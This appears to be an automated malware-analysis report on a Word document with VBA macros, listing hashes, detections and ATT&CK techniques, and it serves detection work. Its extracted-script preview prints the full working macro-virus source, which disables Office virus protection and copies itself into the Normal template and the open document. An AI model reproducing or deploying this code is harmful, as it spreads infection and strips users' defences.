Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9cc7b2865ccafb1a…

MALICIOUS

Office (OLE)

302.5 KB Created: 2007-06-02 22:28:00 Authoring application: Microsoft Word 10.0 First seen: 2014-06-27
MD5: 94a2e613ccc0ab5437152c32fe177392 SHA-1: 7e1c49b13d687e3bf99000fb0c4691c5fc003735 SHA-256: 9cc7b2865ccafb1a0f7ccdd60f73ad0ae6e8cc76a058ac3468d5f666eae42acb
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Office document containing VBA macros. The `Document_Open` subroutine is designed to disable virus protection and replicate its code into both the active document and the Normal.dot template, indicating a self-replication and persistence mechanism. The ClamAV detection and critical heuristics for macro-virus replication and AV tampering strongly support this assessment.

Heuristics 4

  • ClamAV: Doc.Trojan.Marker-35 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-35
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    'Switch the VirusProtection OFF
    Options.VirusProtection = False
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    '

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1591 bytes
SHA-256: f444fdd17e27c2cc3aa7bafa46250018151dc8880c977327c6cfaf6789fdef7a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'
' ********** Anti-Virus macro by Patrick **********
'
' <- this is a marker!
' DO NOT delete or alter the above marker line since the original virus looks for it
' and will not infect the document if the above line exists

Const Marker = "Patricks marker!"
On Error Resume Next

'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInnoculated, NormalTemplateInnoculated As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String

'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)

DocumentInnoculated = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInnoculated = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)

'Switch the VirusProtection OFF
Options.VirusProtection = False

  'Innoculate the NormalTemplate
  If DocumentInnoculated = True Then
    OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
    nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
    nt.CodeModule.AddFromString OurCode
    NormalTemplate.Save
  End If

  'Innoculate the ActiveDocument
    OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
    ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
    ad.CodeModule.AddFromString OurCode
    ActiveDocument.Save
  
End Sub